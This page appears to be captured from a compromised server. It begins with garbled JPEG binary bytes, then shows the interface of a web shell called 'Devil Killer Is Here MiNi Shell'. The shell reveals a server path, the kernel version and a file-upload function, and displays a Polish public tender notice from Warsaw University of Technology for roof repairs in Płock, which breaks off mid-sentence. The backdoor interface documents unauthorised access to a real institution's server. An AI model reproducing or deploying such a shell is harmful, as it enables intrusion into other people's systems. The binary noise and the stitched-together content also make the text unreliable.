JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210820/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210820/0015513501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót remontowych dachu części niskiej Hali Sportowej PW Filii w Płocku przy ul. 7 czerwca 1991 r. nr 3 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA WARSZAWSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">PLAC POLITECHNIKI 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-661</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">Politechnika Warszawska, Pl. Politechniki 1, 00-661 Warszawa</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">Filia w Płocku, ul. Łukasiewicza 17, 09-400 Płock, REGON: 000001554-00020, tel. (24) 36-72-221</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.plock@pw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.pw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót remontowych dachu części niskiej Hali Sportowej PW Filii w Płocku przy ul. 7 czerwca 1991 r. nr 3 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19d38264-0186-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00155135</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00099646/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.45 Remont dachu Hali sportowej - część niższa budynku w Płocku przy ul. 7 czerwca 1991r nr 3</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zamowienia.pw.edu.pl/wykaz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.zamowienia.pw.edu.pl/wykaz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.1.<br/>Komunikacja ustna dopuszczalna jest w toku negocjacji. (art. 61 ust. 2 ustawy Pzp.)<br/>10.2. Ofertę oraz oświadczenia o spełnianiu warunków udziału w zamówieniu oraz o braku podstaw<br/>wykluczenia składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. (art. 63 ust. 2)<br/>10.3. Niniejsze postępowanie jest prowadzone w języku polskim w formie elektronicznej za<br/>pośrednictwem miniPortalu: https://miniportal.uzp.gov.pl, ePUAPu: https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej: zamówienia.plock@pw.edu.pl<br/>10.4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,<br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany lub wycofania oferty oraz do formularza do komunikacji.<br/>10.5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej (ePUAP) (regulaminy dostępne na stronach miniPortalu oraz<br/>ePUAPu).<br/>10.6. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z miniPortalu określone w Regulaminie miniPortalu oraz zobowiązuje się<br/>korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>10.7. Za datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP lub na skrzynkę poczty elektronicznej – dla dokumentów, co do których dopuszczono taką formę przekazania..<br/>10.8. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami<br/>w szczególności składanie ofert, oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal (Formularz do komunikacji). We wszelkiej korespondencji związanej<br/>z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się znakiem postępowania.<br/>10.9. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń<br/>lub elektronicznych kopii dokumentów lub oświadczeń (za wyjątkiem oferty wraz z załącznikami) za<br/>pomocą poczty elektronicznej, na adres email zamowienia.plock@pw.edu.pl<br/>10.10. Pytania należy kierować drogą elektroniczną, przy użyciu poczty elektronicznej na adres email<br/>zamowienia.plock@pw.edu.pl.<br/>10.11. Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu<br/>środków komunikacji elektronicznej wskazanych w SWZ. (281 u 1 p 9)<br/>10.12. Zamawiający wyznacza do porozumiewania się z Wykonawcami: Monika Lewandowska/Joanna<br/>Jamowska, e-mail: zamowienia.plock@pw.edu.pl, tel. (24) 36-72-221.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO” i ustawy z dnia 21 lutego 2019 r. o zmianie niektórych ustaw w<br/>związku z zapewnieniem stosowania rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r., Zamawiający informuje, że:<br/>22.1.1. administratorem Pani/Pana danych osobowych jest Politechnika Warszawska, Pl. Politechniki<br/>1,<br/>00-661 Warszawa,<br/>22.1.2. z inspektorem ochrony danych osobowych w Politechnice Warszawskiej można kontaktować<br/>się pod adresem e-mail: iod@pw.edu.pl;<br/>22.1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z powyższym postępowaniem;<br/>22.1.4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 lub 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych, zwanej dalej „ustawa Pzp”;<br/>22.1.5. Administrator będzie przetwarzać dane osobowego w zakresie procedury mającej na celu<br/>wyłonienie wykonawcy, a w efekcie zawarcia umowy, mocą której zostanie udzielone zamówienie<br/>publiczne. Oznacza to, że danymi chronionymi w zakresie procedury udzielania zamówienia będą<br/>wszelkie dane osobowe znajdujące się w ofertach i wszelkich innych dokumentach składanych w toku<br/>prowadzonego postępowania przez wykonawcę. Powyższe dotyczy danych osobowych tylko osób<br/>fizycznych, takich jak: dane osobowe samych wykonawców składających ofertę, w tym konsorcjantów,<br/>podwykonawców, osób trzecich udostępniających swój potencjał, ich pełnomocników, pracowników,<br/>itp.;<br/>22.1.6. Jednocześnie Zamawiający informuje, że wystarczające będzie wskazanie jedynie tych<br/>danych, których Zamawiający wyraźnie żąda lub tych, które wprost potwierdzają spełnienie wymagań<br/>przez wykonawcę;<br/>22.1.7. Administrator nie zamierza przekazywać Pani/Pana danych osobowych poza Europejski<br/>Obszar Gospodarczy;<br/>22.1.8. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, jednak nie dłużej niż do<br/>upływu okresu przedawnienia roszczeń wynikających z niniejszego postępowania i zawartej umowy w<br/>wyniku tego postępowania. Ponadto dane te będą archiwizowane zgodnie z rozporządzeniem prezesa<br/>Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z<br/>2011 r. nr 14 poz. 67 ze zm.), będącym aktem wykonawczym do ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach (Dz. U. z 2019 r. poz. 553 ze zm.);<br/>22.1.9. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>22.1.10. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany oraz nie będzie wykonywane profilowanie Pani/Pana, stosowanie do art. 22 RODO;<br/>Pozostałe informacje znajdują się w I Rozdziale pkt 22 Rozdziału I SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.261.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego zamówienia jest: „Wykonanie robót remontowych dachu części niskiej<br/>Hali Sportowej PW Filii w Płocku przy ul. 7 czerwca 1991 r. nr 3”. Szczegółowe określenie<br/>zakresu przedmiotu zamówienia zawarte jest w Rozdziale IV SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261214-7 - Kładzenie dachów bitumicznych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie dotychczasowemu Wykonawcy robót budowlanych,<br/>zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. Zamówienia te będą powtórzeniem rodzaju robót zgodnych z przedmiotem zamówienia podstawowego. Zamówienia te będą realizowane<br/>na zasadach analogicznych do zamówienia podstawowego określonych w Rozdziale IV niniejszej<br/>SWZ, a także w Projektowanych Postanowieniach Umowy. Warunkiem udzielenia zamówienia jest<br/>pojawienie się środków finansowych, które będzie można przeznaczyć na jego realizację.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. Zamawiający wymaga, aby Wykonawcy biorący udział w postępowaniu spełniali warunki,<br/>o których mowa w art. 112 ust. 2 ustawy Pzp, dotyczące:<br/>7.1.1. zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowych wymagań w zakresie tego warunku.<br/>7.1.2. posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowych wymagań w zakresie tego warunku.<br/>7.1.3. sytuacji ekonomicznej lub finansowej.<br/>W celu potwierdzenia spełnienia przez Wykonawcę warunku udziału w postępowaniu,<br/>Zamawiający będzie żądać od Wykonawcy, którego oferta została oceniona jako<br/>najkorzystniejsza, wykazania, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną nie mniejszą niż 55 000,00 zł.<br/>7.1.4. zdolności technicznej lub zawodowej<br/>a) zdolności techniczne<br/>Zamawiający nie wyznacza szczegółowych wymagań w zakresie tego warunku.<br/>b) kwalifikacje zawodowe<br/>W celu potwierdzenia spełnienia przez Wykonawcę warunku udziału w postępowaniu,<br/>Zamawiający będzie żądać od Wykonawcy, którego oferta została oceniona jako<br/>najkorzystniejsza, wykazania, że ma do dyspozycji odpowiednio wykwalifikowane osoby, w tym:<br/>kierownika budowy / kierowników robót o minimalnych kwalifikacjach zawodowych – co najmniej<br/>5 lat na stanowisku kierownika budowy lub kierownika robót, uprawnienia do kierowania<br/>robotami budowlanymi w zakresie wystarczającym do wykonania przedmiotu zamówienia<br/>zgodnie z Ustawą Prawo Budowlane, będących członkami Okręgowej Izby Inżynierów<br/>Budownictwa.<br/>Uwaga!<br/>Jako minimalne kwalifikacje zawodowe rozumie się lata czynne zawodowo od daty uzyskania<br/>uprawnień budowlanych, przepracowane na stanowiskach takich jak zaproponowane w ofercie.<br/>c) doświadczenie zawodowe<br/>W celu potwierdzenia spełnienia przez Wykonawcę warunku udziału w postępowaniu,<br/>Zamawiający będzie żądać od Wykonawcy, którego oferta została oceniona jako<br/>najkorzystniejsza, wykazania,<br/>że zrealizował nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, zamówienia rodzajowo i wartościowo porównywalne z<br/>przedmiotem niniejszego przetargu, tj.: wykonanie co najmniej dwóch zadań o podobnym<br/>zakresie o wartości nie mniejszej niż 55 000,00 zł brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">8.2. Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia następujących podmiotowych środków dowodowych:<br/>8.2.1. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>8.2.2. zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>8.2.3. odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>8.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu składa każdy z<br/>Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>8.4. Wykonawca, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy<br/>Pzp, przedstawia także podmiotowe środki dowodowe, dotyczące tych podmiotów w zakresie<br/>wymaganym dla Wykonawcy, określonym w pkt od 8.2.1. do 8.2.3.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu oraz braku podstaw do wykluczenia z postępowania, do oferty należy załączyć:<br/>8.1.1. Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu<br/>aktualne na dzień składania ofert składane na podstawie art. 125 ust. 1 ustawy Pzp - załącznik nr 1 do<br/>Rozdziału II SWZ. Oświadczenie to stanowi wstępne potwierdzenie, że Wykonawca spełnia 